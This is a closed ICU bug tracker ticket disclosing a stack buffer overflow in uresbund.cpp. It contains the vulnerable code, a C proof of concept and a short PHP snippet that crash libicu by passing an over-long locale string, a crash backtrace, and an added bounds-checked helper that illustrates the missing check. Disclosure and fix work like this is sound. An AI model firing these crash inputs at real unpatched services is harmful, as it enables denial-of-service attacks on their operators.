
buffer overflow vulnerability in uresbund.cpp

Description

Reported by Michele Spagnuolo mikispag at google.com

Hello icu-team,

I would like to report a buffer overflow vulnerability I have discovered in libicu while fuzzing the bundled version in the latest PHP 5.5.12 (libicu 4.8.1.1).

Nicolas (nruff@) came up with this analysis of the bug:

=====
https://cs.corp.google.com/#piper///depot/google3/third_party/icu/source/common/uresbund.cpp&l=1735

U_CAPI UResourceBundle* U_EXPORT2
ures_getByKeyWithFallback(const UResourceBundle *resB,
                          const char* inKey,
                          UResourceBundle *fillIn,
                          UErrorCode *status) {
    ...
    char path[256];
    ...
    if (len > 0) {
        uprv_memcpy(path, resPath, len);  // resPath = "Langages/" when triggered from mikispag@ PoC
    }
    uprv_strcpy(path+len, inKey);  // inKey is user-supplied so that will end badly
    ...
...

Here is a trivial PoC that will trigger the bug:

-------------------------------------------------------------------------------------------------------------------
#include <stdlib.h>
#include <string.h>
#include "unicode/utypes.h"
#include "unicode/uenum.h"
#include "unicode/uloc.h"

#define RESLEN 512

// COMPILE WITH:
// gcc -o funicu funicu.c `pkg-config --libs --cflags icu-uc icu-i18n icu-le icu-lx icu-io`

int main(void) {
    char locale[512];
    UChar *result;
    UErrorCode err = U_ZERO_ERROR;  // must start as U_ZERO_ERROR, otherwise ICU returns early
    int32_t rc;

    result = malloc(RESLEN * sizeof(UChar));  // maxResultSize is counted in UChars, not bytes

    // 511 '*' characters plus terminator: far longer than the 256-byte path buffer
    memset(locale, '*', sizeof(locale));
    locale[sizeof(locale) - 1] = '\x00';

    rc = uloc_getDisplayName(
        locale,    // const localeID
        "en_US",   // const inLocaleID
        result,    // result
        RESLEN,    // maxResultSize
        &err);

    free(result);
    return 0;
}
-------------------------------------------------------------------------------------------------------------------

The PHP snippet that triggers the crash:

*** stack smashing detected ***: php terminated

<?php
// Any string > 255 characters passed as the first parameter of locale_get_display_name
// will cause a buffer overflow in ICU library (libicuuc.so)
//
// #0  0x00007ffff3d0c425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
// #1  0x00007ffff3d0fb8b in __GI_abort () at abort.c:91
// #2  0x00007ffff3d4a39e in __libc_message (do_abort=2, fmt=0x7ffff3e5257f "*** %s ***: %s terminated\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201
// #3  0x00007ffff3de0f47 in __GI___fortify_fail (msg=0x7ffff3e52567 "stack smashing detected") at fortify_fail.c:32
// #4  0x00007ffff3de0f10 in __stack_chk_fail () at stack_chk_fail.c:29
// #5  0x00007ffff4accdac in ures_getByKeyWithFallback_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48
// #6  0x00007ffff4acce03 in ures_getStringByKeyWithFallback_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48
// #7  0x00007ffff4adda09 in uloc_getTableStringWithFallback_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48
// #8  0x00007ffff4adae1b in ?? () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48
// #9  0x00007ffff4adb037 in ?? () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48
// #10 0x00007ffff4adb0bb in uloc_getDisplayLanguage_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48
// #11 0x00007ffff4adbf45 in uloc_getDisplayName_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48
// #12 0x00000000007041d2 in get_icu_disp_value_src_php (tag_name=0xef83ad "name", ht=1, return_value=0x7ffff7fb2140, return_value_ptr=0x0, this_ptr=0x0, return_value_used=1)
//     at /tmp/php-5.5.12/ext/intl/locale/locale_methods.c:542
// #13 0x00000000007044c0 in zif_locale_get_display_name (ht=1, return_value=0x7ffff7fb2140, return_value_ptr=0x0, this_ptr=0x0, return_value_used=1)
//     at /tmp/php-5.5.12/ext/intl/locale/locale_methods.c:602
// #14 0x0000000000b36b2f in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f7a168) at /tmp/php-5.5.12/Zend/zend_vm_execute.h:550
// #15 0x0000000000b3b367 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f7a168) at /tmp/php-5.5.12/Zend/zend_vm_execute.h:2329
// #16 0x0000000000b3623d in execute_ex (execute_data=0x7ffff7f7a168) at /tmp/php-5.5.12/Zend/zend_vm_execute.h:363
// #17 0x0000000000b362c2 in zend_execute (op_array=0x7ffff7fb3048) at /tmp/php-5.5.12/Zend/zend_vm_execute.h:388
// #18 0x0000000000af6d7d in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /tmp/php-5.5.12/Zend/zend.c:1316
// #19 0x0000000000a5ecbd in php_execute_script (primary_file=0x7fffffffd090) at /tmp/php-5.5.12/main/main.c:2506
// #20 0x0000000000ba453f in do_cli (argc=2, argv=0x14141d0) at /tmp/php-5.5.12/sapi/cli/php_cli.c:994
// #21 0x0000000000ba57d4 in main (argc=2, argv=0x14141d0) at /tmp/php-5.5.12/sapi/cli/php_cli.c:1378

$stringLarge = str_repeat('*', 256);
locale_get_display_name($stringLarge);
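A bounds-checked form of the path concatenation discussed in the report above, added here as an illustration of the missing check and not ICU's actual fix for this ticket. The helper names, the stand-in 256-byte buffer, the use of plain memcpy in place of uprv_memcpy, and the '*'-filled sample keys are assumptions made for this example:

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the fixed stack buffer in the affected function (char path[256] in
 * the analysis above); assumed here to stand in for that buffer. */
#define PATH_BUF_SIZE 256

/*
 * Bounds-checked replacement for the pattern
 *     uprv_memcpy(path, resPath, len);
 *     uprv_strcpy(path + len, inKey);
 * The original never checks that prefix + key + NUL fit in path, so a long
 * caller-supplied inKey runs off the end of the stack buffer.
 * This hypothetical helper (not ICU's real fix) writes nothing when the result
 * would not fit and returns -1 so the caller can set an error status; on
 * success it returns the length of the string now held in path.
 */
int build_resource_path(char *path, size_t path_size,
                        const char *resPath, size_t len,
                        const char *inKey)
{
    size_t keyLen = strlen(inKey);

    /* The prefix length the caller passes must not exceed the prefix string. */
    if (len > strlen(resPath)) {
        return -1;
    }
    /* Need len + keyLen + 1 <= path_size; ordered so the subtraction cannot wrap. */
    if (len >= path_size || keyLen >= path_size - len) {
        return -1;
    }

    memcpy(path, resPath, len);
    memcpy(path + len, inKey, keyLen + 1);   /* +1 copies the terminating NUL */
    return (int)(len + keyLen);
}

/*
 * Exercise the helper with the "Langages/" prefix from the analysis and a
 * constructed key of keyLen '*' characters, like the PHP PoC's str_repeat('*', 256).
 * Returns the helper's result: the resulting path length, or -1 if rejected.
 */
int probe_key_length(size_t keyLen)
{
    char path[PATH_BUF_SIZE];
    int rc;
    char *key = malloc(keyLen + 1);   /* constructed sample key */
    if (key == NULL) {
        return -1;
    }
    memset(key, '*', keyLen);
    key[keyLen] = '\0';

    rc = build_resource_path(path, sizeof(path), "Langages/", strlen("Langages/"), key);
    free(key);
    return rc;
}

int main(void)
{
    /* 9-char prefix + 246-char key + NUL = 256 bytes: the largest key that fits. */
    printf("key of   2 chars: %d\n", probe_key_length(2));    /* 11 */
    printf("key of 246 chars: %d\n", probe_key_length(246));  /* 255 */
    printf("key of 247 chars: %d\n", probe_key_length(247));  /* -1, would overflow */
    printf("key of 256 chars: %d\n", probe_key_length(256));  /* -1, the PoC's length */
    return 0;
}
```

The check is done before any byte is written, so a rejected key leaves the buffer untouched; the caller then has to propagate the failure (in ICU's API that would be through the UErrorCode parameter) rather than continue with a truncated or partially built path.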

Environment

Status

Assignee

Andy Heninger

Reporter

Andy Heninger

Labels

tracCc

pedberg

tracCreated

May 08, 2014, 9:54 PM

tracOwner

andy

tracProject

ICU4C

tracReporter

andy

tracResolution

fixed

tracReviewer

markus

tracStatus

closed

Components

Fix versions

Priority

assess